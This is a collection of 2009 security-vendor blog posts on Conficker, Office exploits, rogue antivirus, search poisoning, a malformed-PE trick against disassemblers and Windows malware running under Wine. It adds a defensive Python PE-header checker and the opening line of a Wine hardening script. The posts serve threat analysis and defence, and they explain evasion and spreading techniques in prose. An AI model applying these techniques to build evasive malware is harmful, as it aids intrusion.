    • The average greenhouse gas (GHG) emission associated with a single spam message is 0.3 grams of CO2. That’s like driving three feet (one meter); but when multiplied by the yearly volume of spam, that amount is equivalent to driving around the earth 1.6 million times.
    • Much of the energy consumption associated with spam (nearly 80 percent) comes from users deleting spam and searching for legitimate email (false-positives). Spam filtering accounts for just 16 percent of spam-related energy use.
    • Spam filtering saves 135 terawatt hours (TWh) of electricity per year. That is equivalent to taking 13 million cars off the road.
    • If every inbox were protected by a state-of-the-art spam filter, organizations and individuals could reduce today’s spam energy by 75 percent or 25 TWh per year, the equivalent of taking 2.3 million cars off the road.
    • Countries with greater Internet connectivity and more users, such as the United States and India, tend to have proportionately higher emissions per email user. The United States, for example, had emissions that were 38 times that of Spain.
    • While Canada, China, Brazil, India, the United States and the United Kingdom showed similar energy use for spam by country, Australia, Germany, France, Mexico, and Spain came in about 10 percent lower. Spain had the lowest figure, with both the smallest amount of email that was received as spam and the smallest amount of energy use for spam per email user.

    Not only is spam related to cybercrime and a nuisance, but it also impacts the environment. Download the study here. It’s worth a read.

    Windows Kernel Again Found Vulnerable

    Recently, our APAC threat intelligence team discovered a couple of Windows kernel zero-day vulnerabilities in the field, which could be potentially used for malicious purposes.  These were discovered in some discussion forums in China.

    One of these issues exists in Windows NT/2000/XP according to the description provided. It arises from insecure win32 system calls that do not validate a buffer supplied from user mode. Overwriting a kernel address this way leads to a Blue Screen of Death (BSOD), that is, a denial-of-service (DoS) condition. The issue requires administrative privileges, so it cannot be used for privilege escalation. A deeper look, however, suggests that it could be used to subvert or install kernel-mode hooks, which can serve malicious purposes.

    Besides this issue, another kernel bug with similar behavior was found recently in the field. In this case it involved atapi.sys. 

    The cause of this bug is also the same: It doesn’t verify the data passed from user mode and results in a buffer overflow. In most cases it will also cause a BSOD.

    From the point of view of software design, data passed from user mode should never be trusted and must be always validated. Many of the known Windows local vulnerabilities exist because of this reason. Microsoft noticed this problem and fixed many potential defects in the kernel’s main module. However, many defects still exist in the win32k kernel part because it’s extremely complex. Most kernel vulnerability diggers are now targeting this module and have discovered many vulnerabilities in the past two years. With Windows 7 we will hope that kernel security will grow stronger.

    We’ve notified Microsoft of both of these issues before posting this blog and technical details have been omitted here as the vulnerabilities are unpatched. We’ll do a follow up post after the issues are resolved.

    New Conficker Variant

    McAfee Avert Labs has received a new variant of the infamous Conficker worm. Like the previous variants, this one also spreads using the MS08-067 vulnerability in Microsoft Windows Server Service. But unlike the previous variants, which arrived as a Windows DLL file, this variant seems to arrive as an .EXE file.

    Detection for this variant of the worm will be available as W32/Conficker.worm.gen.d from the upcoming 5579 DAT release. Users of McAfee Artemis Technology are already protected in real time against this threat.

    We have also updated our stand-alone cleaning tool–Stinger–to detect and clean this variant.

    More information on this variant of the Conficker worm is available here. McAfee’s coverage and protection for the MS08-067 vulnerability, is available here.

    For measures to protect yourself and your organization against Conficker, please visit:

    We will continue to monitor this threat in our labs, and will update our blog with any new findings.

    Next Up: Office Exploits Reloaded

    We’ve just seen the Microsoft Excel 0-day attacks in February. Today, Microsoft published a new Security Advisory reporting a new unpatched vulnerability in Microsoft Office PowerPoint.

    McAfee Avert Labs investigated and discovered multiple attacks in the field using the PowerPoint exploit. McAfee VirusScan products detect this threat as the Exploit-PPT.k trojan using the 5573 DATs, to be released on the same day.

    As with most other document exploits, these PowerPoint files install malicious trojans in the background but display an innocent PowerPoint presentation to the victim as a deceptive measure. The following list shows a variety of malware files installed in these attacks:

    • fssm32.exe: 428,032 bytes (Muster.c trojan)
    • IEUpd.exe: 45,056 bytes (Muster.c trojan)
    • setup.exe: 131,072 bytes (Muster.c trojan)
    • PeerCM.exe: 80,666 bytes (Generic BackDoor.u trojan)
    • ws2_42.dll: 106,740 bytes (Generic BackDoor.u trojan)

    Some of these specially crafted exploits arrived as PowerPoint Show files with the “.pps” extension. Such files typically open in full-screen mode and hide the applications running on the desktop, such as system monitoring tools that could give the victim any clue to the dodgy installation of trojans.

    Please keep your DAT files up-to-date and refrain from opening any PowerPoint files from any untrusted sources until a patch is made available by the vendor. Where possible, verify with the sender to make sure what you get is what was intended.

    Conficker Activation On April 1st

    Hello, it is now April 1st for at least Asia Pacific and Europe. We’ve been blogging and posting various resources about ways to protect against the Conficker worm up to its “activation day”:

    The day has finally arrived.

    McAfee Avert Labs has been closely monitoring Conficker-related threats, and we haven’t observed any significant activity on the domains that it is polling thus far. Even so, please remain vigilant and watch this space for any further updates to the current status.

    On measures to protect yourself and your organisation against Conficker, please visit:

    Message in a Malware

    We often see messages from malware authors in the malware that we analyze. And, strangely, unlike the theme of The Police’s hit song “Message in a Bottle,” these are never expressions of love. On the contrary, they’re usually offensive.

    Backdoor-DOQ is a backdoor Trojan. A variant that we analyzed last week would, among other things, establish a connection to a remote server via IRC and wait for commands from an attacker on the communication channel. Beyond its nastiness, the Backdoor-DOQ executable contains a message in plain text. I’ve censored the nonfamily friendly pieces of this: “I do voodoo on your mom [expletive]. BTW metal rules pop sucks.”

     Backdoor-DOQ Voodoo

    It’s hardly a love song.

    Another Day, Another Rogue Security Program

    There is really no scarcity of spurious security programs. Almost daily, we see programs that pretend to be security programs but in reality are malicious. They display messages about system compromise and attempt to frighten users into purchasing some other malicious program to prevent the compromise. Or worse. While displaying fake messages about system compromise is bad, it’s almost benign when you consider that a rogue antispyware could itself be spyware.

    Last week we stumbled upon FakeAlert-AntiSpywarePro. This is a rogue antispyware program. If you’re unlucky enough to run this application, you’ll see a window such as this:

    You can run several kinds of system scans with this program. But to what avail? You can’t trust a program that lies to you. FakeAlert-AntiSpywarePro drops a number of files and installs a bunch of registry keys, including a key for a browser-helper object (BHO) for Internet Explorer.

    So keep your AV signatures up to date, and say no to FUD seeded by unscrupulous malware authors!

    What you see is NOT what you get

    We’ve all read of social engineering tactics before and how gullible users fall prey to many tactics used by virus authors. As researchers we often give recommendations to family and friends on how not to fall prey to such tricks, but once in a while we need to remind ourselves too that we are included in the intended list of targets.

    As researchers we deal with different flavors of malware. Over time and with experience researchers often reach a state of “enlightenment” where you look at a sample and you know if it’s malicious. At least that’s what we believe; however there are times where we too are made to think twice. When dealing with malware it’s not uncommon for analysts to come across a note from the authors once in a while. At times they are taunts and at times they are something more like the example below. We came across a sample which contains messages for security researchers asking to not add detections for the file as this is not a virus. Considering that there are legitimate packers that put warnings for researchers to prevent falsely detecting them, such non-verbal communication can at times make one take a second look.

    In the words of a malware author

    Besides the fact that they seem to agree that they have authored this program :), technically they are right – this is not a virus, but a trojan downloader! This trojan silently downloads arbitrary files (a porn dialer in this particular case) from a remote site (hxxp://[skipped].com/del/cmb_[random].exe) and executes them. (The new detection added to detect both samples is “Generic.acf”.)

    A second example was a little more fascinating for us. Researchers often take two approaches to analysis: Static (opening up the file in Hiew or other similar tools) and Dynamic (replicating the malware). In this case we opened the file in Hiew and the first thing that was apparent was that the file had abnormal resources and import data.

    Abnormal Resources

    Moving past this error, we also noticed that the Entry Point mentioned in the header is 0001A001 and for an Image Base of 00400000, we should be able to get Hiew to go to the EP which should be at 0041A001. However it looks like the file ends at 00410DFF causing Hiew to fail reaching EP.

    Header Information for EP

    At this point in our minds we are more or less sure that this file is corrupt and it could be the end of analysis, but WAIT !!! Though we may be certain the Windows Loader will complain if we attempt to execute this sample, it actually runs like a charm. OK things are getting really fishy, so back to the drawing board we go. We re-open the file up in Hiew and this time we observe in more detail, the section header.

    Section Table Entries

    There are 10 odd-looking sections, which is fine; some of the sections have a Physical Size of 0 and others overlap, which, though suspicious, is fine too. And then we stumble upon the possible culprit. The authors have modified the Physical Size of the first two sections to FF003000 and FF000200 respectively, whereas their Virtual Sizes are 3000 and 1000. Patching the section sizes to 00003000 and 00000200 fixes the EP issue in Hiew, allowing it to get to the correct EP.

    Heck, even IDA wasn’t able to load the file; it gave the following error and quit: “Virtual Array: Address space limit reached”

    IDA Error

    Olly on the other hand mentions the large section size but still loads it comfortably.

    Clearly the authors are attempting social engineering here by crafting the section table. A second opinion is that using this technique might also trick certain AV products into mis-loading such files. We’d like to hear your thoughts too…

    So the moral of the story is, don’t judge a book by its cover or malware based on only one tool, drink more coffee and keep at it. Happy Researching !!  [We currently detect this as Spy-Agent.dp.gen]
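The section-table trick above can be checked for mechanically. The following is an added example (not code from the original post or from McAfee): it builds a constructed two-section PE32 image whose SizeOfRawData fields carry the FF003000/FF000200 values the post found, flags any section whose raw size the file cannot back, clamps those sizes the way the post patched them by hand, and maps the entry-point RVA to a file offset by the section’s virtual extent (returning None when the entry point is not backed by file bytes). All layout constants, section names and offsets are assumptions for the sample, not the analyzed file.

```python
import struct

# Constructed sample layout (assumed values for this example, not the page's file):
# two sections, SectionAlignment 0x1000, FileAlignment 0x200, entry point in .text.
SECT_ALIGN, FILE_ALIGN, IMAGE_BASE = 0x1000, 0x200, 0x400000
SAMPLE_FILE_SIZE, SAMPLE_ENTRY_RVA = 0xC00, 0x1010
# (name, VirtualSize, VirtualAddress, PointerToRawData, bytes really present in the file)
SAMPLE_SECTIONS = [(b".text", 0x3000, 0x1000, 0x400, 0x600),
                   (b".data", 0x1000, 0x4000, 0xA00, 0x200)]
BOGUS_RAW_SIZES = (0xFF003000, 0xFF000200)   # the SizeOfRawData values the post found in the header


def build_sample_pe(raw_sizes, entry_rva=SAMPLE_ENTRY_RVA):
    """Build a minimal PE32 whose two SizeOfRawData fields are caller-chosen."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))                  # e_lfanew: PE header follows
    opt = bytearray(224)                                         # IMAGE_OPTIONAL_HEADER32
    struct.pack_into("<H", opt, 0, 0x10B)                        # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)                   # AddressOfEntryPoint
    struct.pack_into("<III", opt, 28, IMAGE_BASE, SECT_ALIGN, FILE_ALIGN)
    coff = struct.pack("<HHIIIHH", 0x14C, len(SAMPLE_SECTIONS), 0, 0, 0, len(opt), 0x102)
    hdrs = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, rs, pr, 0, 0, 0, 0, 0x60000020)
                    for (n, vs, va, pr, _), rs in zip(SAMPLE_SECTIONS, raw_sizes))
    image = bytearray(SAMPLE_FILE_SIZE)
    head = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + hdrs
    image[:len(head)] = head
    for _, _, _, pr, present in SAMPLE_SECTIONS:
        image[pr:pr + present] = b"\xCC" * present               # filler standing in for code
    return bytes(image)


def parse_pe(data):
    """Read entry RVA, SectionAlignment and the section table from a PE32 file."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsect = struct.unpack_from("<H", data, pe + 6)[0]            # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]        # COFF SizeOfOptionalHeader
    opt = pe + 24
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    sect_align = struct.unpack_from("<I", data, opt + 32)[0]
    sections = []
    for i in range(nsect):
        off = opt + opt_size + 40 * i                            # IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, off)
        sections.append({"name": name.rstrip(b"\0").decode(), "vsize": vsize, "va": va,
                         "raw_size": raw_size, "raw_ptr": raw_ptr, "hdr_off": off})
    return {"entry_rva": entry_rva, "sect_align": sect_align, "sections": sections}


def raw_bytes_available(data, sections):
    """Bytes the file can really supply per section: up to the next section's raw data or EOF."""
    starts = sorted(s["raw_ptr"] for s in sections)
    avail = {}
    for s in sections:
        later = [p for p in starts if p > s["raw_ptr"]] or [len(data)]
        avail[s["name"]] = max(0, min(later[0], len(data)) - s["raw_ptr"])
    return avail


def section_anomalies(data):
    """Flag section headers whose SizeOfRawData the file cannot back."""
    pe = parse_pe(data)
    avail = raw_bytes_available(data, pe["sections"])
    findings = []
    for s in pe["sections"]:
        if s["raw_size"] > avail[s["name"]]:
            findings.append("%s: SizeOfRawData 0x%08X but only 0x%X bytes available in file"
                            % (s["name"], s["raw_size"], avail[s["name"]]))
    return findings


def repair_section_sizes(data):
    """Clamp each bogus SizeOfRawData to the bytes present, as the post did by hand in Hiew."""
    pe = parse_pe(data)
    avail = raw_bytes_available(data, pe["sections"])
    patched = bytearray(data)
    for s in pe["sections"]:
        if s["raw_size"] > avail[s["name"]]:
            struct.pack_into("<I", patched, s["hdr_off"] + 16, avail[s["name"]])  # SizeOfRawData
    return bytes(patched)


def entry_point_file_offset(data):
    """Map AddressOfEntryPoint to a file offset by each section's virtual extent (as a loader
    sees it); None when the entry point lies in virtual space no file bytes back."""
    pe = parse_pe(data)
    avail = raw_bytes_available(data, pe["sections"])
    for s in pe["sections"]:
        extent = -(-max(s["vsize"], 1) // pe["sect_align"]) * pe["sect_align"]
        if s["va"] <= pe["entry_rva"] < s["va"] + extent:
            delta = pe["entry_rva"] - s["va"]
            return s["raw_ptr"] + delta if delta < avail[s["name"]] else None
    return None
```

Calling section_anomalies(build_sample_pe(BOGUS_RAW_SIZES)) reports both sections; after repair_section_sizes the same check is clean and the entry point resolves to file offset 0x410.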

    More Comments Regarding Conficker

    A lot has been published about Conficker already–this blog is an addendum to our previously published “W32/Conficker: Much Ado About Nothing.” Here we offer some Conficker snippets, if you will.

    First off, you may be confused by the differences between the a, b, and c variants. Let’s clear this up a bit. The Conficker.worm.a and Conficker.worm.b variants use the MS08-067 vulnerability in Microsoft’s Server Service for propagation. The latest variant, Conficker.worm.c, has included significantly updated functionality. This update, while complex and clever, was performed on Conficker.worm.a and Conficker.worm.b infections–meaning that the exploit was not included in the update’s payload. SRI International has a good write-up about this as well as other technical details. (Note: You’ll get a patch you wish you didn’t get!)

    The next thing you probably want to know–and what’s probably most important to you when dealing with this–is how are you going to combat this threat? Riding to the rescue we see Avert Labs Services. They have published a practical “in the trenches” document to help you identify and combat the infection.

    But beyond anti-malware protection, what else can you do?

    The best way is to prevent initial, or further, infection. If you have the latest variant, you were most probably hit by the Conficker.worm.a or Conficker.worm.b variants. McAfee VirusScan or our standalone Stinger utility are useful tools. If you also have a vulnerability manager and host/network IPS you may have other avenues to explore. These tools could allow you to detect any missing MS08-067 patches, prevent code execution in the event of a buffer overflow, or detect traffic from the Conficker.worm.a and Conficker.worm.b over the wire. These steps could help you shut the door on the initial infection vector. In fact, the combined additional coverage when using McAfee (formerly Foundstone) Vulnerability Manager, McAfee Host Intrusion Prevention (formerly Host IPS), and McAfee Network Security Platform (formerly IntruShield) would give you four checks, and four signatures plus generic buffer overflow protection. That’s great additional firepower.

    Another good resource? The page you are currently visiting. We’ll be sure to update you as things progress.

    === Update March 31, 2009, 7pm PDT ===

    It’s already April 1 in many parts of the world. And, thankfully, so far it’s been quiet on the Conficker front. If you’re scrambling to check for Conficker infection on your systems, then check out our Conficker Detection Tool. Also, remember to keep your product signatures updated!

    W32/Conficker: Much Ado About Nothing?

    In the run-up to April 1, the media spotlight around the latest Conficker worm variant has reached a morbid frenzy. From being touted as an “April Fool’s joke” to outrageous headlines such as “Millions of computers expected to be destroyed”–no other worm in recent history has generated this much media attention. But what have we learned from history? From the days of Michelangelo to the recent Blaster, SoBig, Sober, and Kamasutra worms, the hype surrounding the activation or payload dates of major Internet worms has turned out to be only a damp squib.

    What happens on April Fool’s Day is anyone’s guess. Although we still don’t know the real intent of the authors of the Conficker worm, they have consistently improved the worm by adding new functionality and anti-debugging tricks with every released variant. In order to resist the Conficker Cabal initiative, which recently blocked domain registrations associated with previous Conficker A and B variants, the worm authors upped the randomly generated domain count from 250 to 50,000. The intent behind generating and attempting to contact so many domains is to make it extremely difficult for security researchers to monitor sites that could potentially host a payload for the Conficker worm to download and execute.

    What we do know is almost all the security vendors have thoroughly analyzed Conficker–also known as Downadup and Kido worm–and have good generic detection and cleaning in place. Uploading a couple of randomly selected Conficker binaries to the VirusTotal site consistently shows an overall anti-virus detection rate of 90 percent or above. And these high detection rates are across vendors–small or big.

    To prepare for any trouble on April 1, McAfee now offers a special build of its standalone cleaning tool Stinger, which will be updated on a daily basis to include any undetected Conficker variants from the wild. This special build of Stinger can be downloaded from the Avert Tools site. We’ve also posted detailed documentation on mitigation steps that security staff within organizations can take to combat W32/Conficker. Additional McAfee product coverage information for MS08-067–the Microsoft Windows Server Service vulnerability, which is exploited by the worm–can be viewed at the McAfee Threat Center.

    Please ensure that your copy of Microsoft Windows is patched and your security software is fully up to date. That way you won’t end up an April Fool.

    Should I Care About server.exe?

    Computer users know that they shouldn’t touch system files. If they did, they could damage their computers. A well-known ploy of malware authors is to name their files after system files. Users can be tricked into ignoring malicious files on their systems by this social-engineering method.

    Let’s look at what the Backdoor-CEP.gen Trojan does, for example. When a user is infected with this Trojan, it drops the file server.exe into the user’s system directory:

     server.exe

    Like many system files, server.exe is hidden. Now how many users would take a second look at server.exe in their system32 folders? Unfortunately, server.exe is a backdoor that waits for and responds to commands from remote attackers. As always, users should exercise caution when dealing with executables of unknown origin. For more about the Backdoor-CEP.gen family, check out its VIL page.

    Patch Those Internet Printers

    When I wrote a scanner plug-in this week for an old directory traversal vulnerability–CVE-2008-4419–I wondered whether there are vulnerable HP LaserJet printers online that can be controlled from the Internet. To find out, I used Google. The search listed almost 50 results, and I found that almost all of these printers are not patched, even though HP has provided firmware updates to resolve this vulnerability. An attacker could leverage this Unicode-encoded directory traversal vulnerability to read configuration files or cached documents, and gain read access from the Internet to important internal information.

    Usually administrators ignore the security of printer devices. They may think there is no harm even if the printer can be controlled remotely by an attacker.

    The administration web interface of these LaserJets can be accessed without passwords. The attacker can use these LaserJets to print any documents from anywhere. Although attackers may not be able to reach the printouts, at least they can waste a lot of paper. Spammers can also post free advertising to companies if they connect to these printers. ;)

    So please harden your network gateway or firewall to restrict access to these devices. Don’t give everyone on the Internet a chance to use your printer, and patch the vulnerable LaserJets to prevent the potential information disclosure.

    To download the HP firmware updates and upgrade instructions, click here.

    McAfee Debuts ‘Combating Threats’ Series

    McAfee Avert Labs will now produce more detailed documentation on prevalent threat families. The “Combating Threats” document series is designed to arm security staff within organizations with more information concerning prevalent threat families as well as to provide additional mitigation steps that can be taken. The first two documents in this series, “W32/Virut Family” and “Finding W32/Conficker.worm,” are now available via our blog, prior to our “Combating Threats” web page going live.

    UPDATE MARCH 17th

    Apologies for the busted links yesterday. All seem to be resolving fine now.

    Democrats.org Cans the Spam

    Last week I blogged about how the community forum of Democrats.org was being abused to help manipulate Google’s search results, leading people to malware. It appeared that by the end of last week, Democrats.org began the cleanup process of removing all the bogus posts, which seems to have been completed as of this time. Google’s cache shows that other popular sites were hit as well, including my.barackobama.com and Microsoft’s silverlight.net, which were cleaned up sometime before the end of last week.

    In looking a little more at the spammed phrases, it appears as though there are likely multiple groups behind these attacks, perhaps with different agendas.   Some of this is obvious from the formatting of the spam.  The terms themselves also vary, some appear in more dictionary style, while others are more focused on current events, and others still are rather uncommon.  The uncommon terms (including typos) lead me to speculate that at least some terms originated from compromised systems.  There may be a circular nature to this, where unsuspecting victims become infected with one piece of malware, only to have their search terms harvested, analyzed, and subsequently used to entice other victims, but again this is speculation at this point.

    Avert Passes Milestone: 20 Million Malware Samples

    One month ago, my colleague Marius Van Oers posted a blog to announce that the number of drivers in our DATs had passed 500,000. Today, McAfee reached another record: We received our twenty-millionth malware sample.

    In about 22 years, from 1986 to March 2008, 10 million samples piled up in our collection. In just the last 12 months, however, from March 2008 to March 2009, this figure doubled. This pace represents 27,000 samples in a day, or 1,100 each hour.

    These figures demonstrate that real-time response is more vital than ever. But it is not sufficient. Faced with such quantity, researchers have to innovate to create sophisticated heuristic detections. And a third need is a multidisciplinary response: Research teams devoted to host intrusions, network intrusions, and ethical vulnerability disclosure also have to play an important part in this battle. As a global research team, McAfee Avert Labs is able to take up the challenge. I’ll just wish “good luck” to all my colleagues. :-)

    McAfee Monthly Spam Report for March

    The third edition of our monthly spam report was released today. This edition discusses some fascinating topics. Key findings include:

    Spam campaigns are taking advantage of “partitioning” to increase their effectiveness and combat the efforts of security tools to reduce their reach.

    Replica-watch spam has taken over the number one position for holiday spam.

    Business leaders and legislatures have promised to stamp out spam, yet the plague persists. Does reputation-based security hold the key?

    Putting a dollar value on productivity lost due to spam.

    The topic of lost productivity and bringing quantifiable numbers to the impact of spam on a business is particularly interesting and worth a solid read. Download a copy here.

    Renamed Notepad.exe Plagues Removable Drives

    During the last couple of years we have seen malware authors increasingly incorporate the autorun.inf infection vector into malware families–with stunning success. In addition to traditional autorun worms that use this feature, pure-play backdoors, bots, password stealers, and even parasitic viruses that previously required a user to click on an executable file to infect the system have incorporated this technique. While the autorun functionality in operating systems does provide some convenience (it saves a couple of clicks), it has single-handedly revived the 1980s model of hand-carried malware propagation.

    Two prolific parasitic virus families that have incorporated this infection vector are W32/Sality and W32/Virut. When a removable drive is inserted into an infected machine, the W32/Sality virus infects Microsoft Notepad or Minesweeper and copies it onto the removable drive. The infected notepad.exe or winmine.exe file is renamed with a random .pif or .scr extension and is accompanied with an obfuscated autorun.inf. Below you’ll see a code snippet and the accompanying autorun.inf file.

    Code Snippet of W32/Sality

    Accompanying Autorun.inf file

    Even if the removable drive is cleaned of the virus infection, the randomly named Microsoft executable would still exist on the drive. Although benign, the leftover remnants would cause some degree of confusion about the origin of the file. Especially since it’s a renamed Microsoft file with a .pif or .scr extension!

    The W32/Virut virus is also known to copy infected notepad.exe files to removable drives. Both these virus families are a royal pain in the posterior to clean. This technique provides a resourceful way for them to reinfect hosts even after cleanup.

    Google Trends Abused to Serve Malware

    The other day a worm, often referred to as “Error Check System,” was spreading on Facebook. In fact, if you searched for information on this threat, your search results were poisoned to lead unsuspecting victims to a site that attempts to install a rogue anti-spyware Trojan. Some folks blogged that this search connection was “too much of a coincidence,” and that the Facebook part of the threat was a “red herring.” I do not believe this is the case, and here’s why.

    Last week I was following up on a comment made to the McAfee Avert Labs blog. The URL provided by the visitor (**********.******.bee.pl/waledac_botnet.html) redirected to another site that attempted to install the same trojan. Running a search on part of that URL yielded hundreds of search results, many placed high up on Google’s results. The summary text was relevant for the search term, and it’s clear that those behind the redirects are manipulating the Internet (Google) by not only getting their newly created sites to appear high on the search results page, but also displaying relevant text in the page summary section, and for the hottest terms. Here’s one example, ironically related to the recent Gmail outage.


    You’ll also notice that the page summary is identical to the top search result, taken from Google News.  Looking at more search results it is clear that the attackers are targeting popular search terms.

    Other searches show the results using all-lowercase titles, the same as used by Google Trends. In fact, checking some of the top Google Trends links we can see that the abusers are hitting it (ash wednesday 2009 was the #1 search term at the time of this writing; this image was edited to fit on the blog).

    The notion of malware distributors abusing Google Trends is not new, and received some attention in October of last year.  However, I do not recall previous attacks being as aggressive as the current ones, being distributed across numerous sites, targeting many many high-profile search terms, and having the poisoned links regularly appearing high up in the result pages.

    Once a user visits one of these poisoned links, the destination page references a script file (style.js), which is obfuscated.

    Decoding the script shows that it redirects the user based on the referring URL being “google”, “msn”, “yahoo”, “comcast”, or “aol.com”. This is just one of the many ways the bad guys focus their attacks on potential victims, while making it a tiny bit more difficult for others to discover it. Once you’re redirected, it’s situation normal for the attackers: various fake alert and scanning messages and windows appear, ultimately leading to the installation of a FakeAlert trojan (such as one of the 9,500+ known binaries identified by McAfee as FakeAlert-AB).

    If you made it down to the bottom of this blog, I probably don’t need to remind you to look carefully before you click, on the Web.

    What Have We Learned From Past Virus Infections?

    The year 2009 has so far been a hectic one for anti-virus vendors and IT administrators alike, “thanks” to two prolific malware families: W32/Conficker and W32/Virut. Malware researchers and field engineers have literally burned the midnight oil to ensure networks are protected against these threats.

    Some of the organizations that were hit with these infections had the latest Microsoft updates installed but still got infected. During the post-mortem of the outbreaks, one glaring mistake stood out.

    Administrators routinely attend to distress calls from users whenever they have an issue with their machines. By habit, the admins tend to log onto the affected workstation using their own accounts—which have domain-administrator privileges. For a moment, let us assume the suspect workstation was infected with W32/Conficker. What could possibly go wrong from here?

    When the W32/Conficker worm infects a machine, it scans the local network and attempts to infect machines using the credentials of the currently logged-on user. If the initial login attempt fails, then the worm attempts a brute-force attack to authenticate, using a hardcoded list of passwords. Because most organizations have enforced complex password policies these days, brute-forcing is ineffective. But the moment the administrator logs onto the affected machine using his or her domain account, W32/Conficker runs using the elevated credentials of a domain administrator. Straight away the worm can infect any host on the domain using these newly acquired administrator credentials. Shown below is a traffic-capture screenshot of this behavior.

    W32/Conficker infecting via SMB

    Upon copying the worm’s DLL to the System32 folder, W32/Conficker proceeds to create a scheduled job task to execute the worm at a predefined time. In a matter of minutes the entire network, with thousands of machines, gets infected.

    It’s pretty much the same story with W32/Virut, a polymorphic entry-point-obscuring virus that spreads by infecting executable and script files. A machine infected with W32/Virut would scan and infect shared drives on the network using the credentials of the currently logged-on user. Because most domain users have limited write access to shared resources on the network, the infection is confined to a subset of machines. But the moment the administrator commits the cardinal sin of logging onto an infected machine, W32/Virut runs with elevated credentials and has write access to every C$ and Admin$ share on the network.

    To prevent such an outbreak from happening, it is imperative that administrators refrain from logging onto a suspect machine using their own accounts. Logging on using the workstation’s local administrator account can also have the same effect; most corporate workstations are ghosted from the same image and could have the same local admin account and password.

    An alternative is to use remote desktop solutions such as VNC, GoToAssist, or TeamViewer. These three are not tied to domain authentication. Once a suspect machine is identified, it should be isolated from the network for further investigation. Better safe than sorry ;-)

    Running Windows Malware in Linux

    For the unaware, Wine is an application that enables users to run Windows applications on Unix-like computers. Like many users, I use Wine on my Linux machine to run a couple of Windows applications I cannot do without. I could run these applications on a virtual machine, or even dual-boot with Windows and Linux, but running them in Wine is just easier.

    Although running Windows applications in Wine has its advantages, it also comes at a price: bringing Windows malware into Linux. I’m aware that it isn’t Wine’s responsibility to distinguish between a malicious and a nonmalicious file, and that Wine shouldn’t have any problem running a malicious file; however, I had this morbid curiosity to see how well today’s malware would fare running on Wine, and so began an experiment using the following setup:

    • Ubuntu Linux 8.04 [comes with Gnome desktop environment]
    • Wine 1.0 [run as a nonroot user with default settings]

    I decided to choose samples that displayed a cocktail of malicious behavior, and so I chose the following:

    File Infectors

    W32/Philis is a file infector that, apart from appending its code to other executables, downloads and drops other malware.

    This malware ran without throwing any errors in Wine. It immediately dropped files in the “Windows” and “Windows\System32” folders and executed these dropped files. It then attempted to connect to a preconfigured site, and downloaded more malware successfully. It also began infecting executables in the Wine directory and created a registry run key for the malicious file.

    The screenshot below shows the clean “CProcess.ori,” the original file 35KB in size, and “CProcess.vir,” the infected file 131KB in size.

    It’s worth mentioning that the autostart registry key the file infector created will not work under Wine, so applications will not be able to autostart when the Linux machine is booted up. Also, this file infector didn’t seem to infect ELF files. But I’m guessing that a file infector that blindly appends/prepends its code to other files shouldn’t have any problem corrupting ELF files.

    Autorun Malware

    W32/Autorun.Worm.CP is an autorun worm, which drops autorun.inf in the root of removable drives.

    This malware also ran without any errors. It dropped both the malicious files and the associated autorun.inf file in the C:\ drive and attached removable devices, and created a registry run key.

    The screenshot below shows the created Autorun.inf file, along with the malicious files that were created in the root of the removable device.

    The registry run key created by the malware won’t work in Wine, however. As long as the malicious file is running, any new removable devices connected to the machine will get infected, thus making a Linux machine the origin of an infection.

    Although it is difficult for malware to autostart in Wine, it is not impossible. Malware can be written to find out if it is running in Wine. It can then either download a Linux binary onto the machine and/or simply add an autostart entry for itself in the Linux desktop environment’s common autostart locations, using the nonroot user’s credentials.

    IRC Trojans

    IRC/Contact malware drops files and connects to a preconfigured IRC server. This IRC Trojan, when run in Wine, connected to the preconfigured IRC server. From the IRC server I was able to connect to the bot and control it. Though the control was limited, I was still able to list the files under the Wine directory, get system information, download files to the Linux machine remotely, etc.

    The screen shot below shows my logging into the infected Linux machine and issuing commands:


    The screen shot below shows the infected machine responding to the “getinfo” command issued from the IRC channel:


    This IRC Trojan was very simple in features, but I’m guessing that with a complex one, an attacker shouldn’t have any problem scanning the subnet for an exploit and sending a payload to infect Windows machines.

    Keyloggers/Password Stealers

    Apart from this, I tried running a couple of password stealers and keyloggers, but I couldn’t find one that worked well. I’m guessing they couldn’t get a hook to the keyboard.

    Although stealing information using Windows malware in Wine is difficult, an infected Linux machine can still contribute to a DoS attack or be the origin of an infection, as suggested earlier.

    Scareware

    This class of malware displays falsely exaggerated scan reports and tricks users into buying it. It utilizes extreme social-engineering tactics combined with obfuscated JavaScript that checks for exploits on the machine.

    Although I didn’t run the Scareware installer in Wine, I did browse through a site that ran JavaScript to pop up a window informing me that my “Windows” machine was infected, and requested that I install the malicious file.

    Screen shots below:


    It is important to note that if the user had associated Windows executables with Wine in the desktop’s file-type settings, simply double-clicking the downloaded file would have run the malware.

    Mitigation Techniques

    • Never run Wine applications as root.
    • Wine maps the root directory (as drive Z:) and can also map the user’s home directory, CD-ROMs and any removable devices it finds; the mappings are symbolic links in “~/.wine/dosdevices/”. Consider deleting all of them except c:, the link to your drive_c, so Windows code sees nothing beyond the prefix.
    • Do not associate Windows executables with Wine in the desktop’s file-type settings. Doing so lets any Windows executable run in Wine with a simple double-click.
    • Administrators should think twice before installing Wine on a Linux server. Such machines are seldom rebooted, so the obstacle mentioned earlier, that malware in Wine cannot easily restart itself when the machine boots, no longer matters: a process started once can keep running indefinitely.
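    The list above, plus the autostart-entry check that the earlier paragraph on Wine-aware malware calls for, as one POSIX shell script. This is an added example, not part of the original post and not a Wine tool: it assumes Wine’s default layout (the prefix in ~/.wine or $WINEPREFIX, with dosdevices holding a c: link to drive_c and a z: link to /), the XDG autostart directory ~/.config/autostart, and the MIME types application/x-ms-dos-executable and application/x-msdownload for .exe files; the function names are my own. It only reports by default and deletes drive mappings only when run with --prune.

```shell
#!/bin/sh
# Audit (and optionally harden) a Wine prefix against the risks above.
# Added example: paths are Wine/XDG defaults, function names are mine.

WINEPREFIX="${WINEPREFIX:-$HOME/.wine}"
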